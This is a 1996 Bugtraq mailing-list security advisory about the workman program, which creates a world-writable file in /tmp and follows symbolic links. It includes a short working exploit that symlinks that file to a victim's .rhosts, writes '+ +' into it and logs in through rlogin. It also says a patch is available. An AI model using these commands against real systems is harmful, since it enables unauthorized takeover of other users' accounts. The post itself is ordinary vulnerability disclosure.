[3281] in bugtraq
r00t advisory -- workman vunerability
daemon@ATHENA.MIT.EDU (Gregory Hull)
Mon Aug 26 17:57:15 1996
Date: Mon, 26 Aug 1996 12:21:15 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Gregory Hull <gahull@ccs.neu.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
r00t advisory [ workman ]
[ Aug 25 1996 ]
-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman. Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.
-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user
-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.
r00t -- http://www.r00t.org
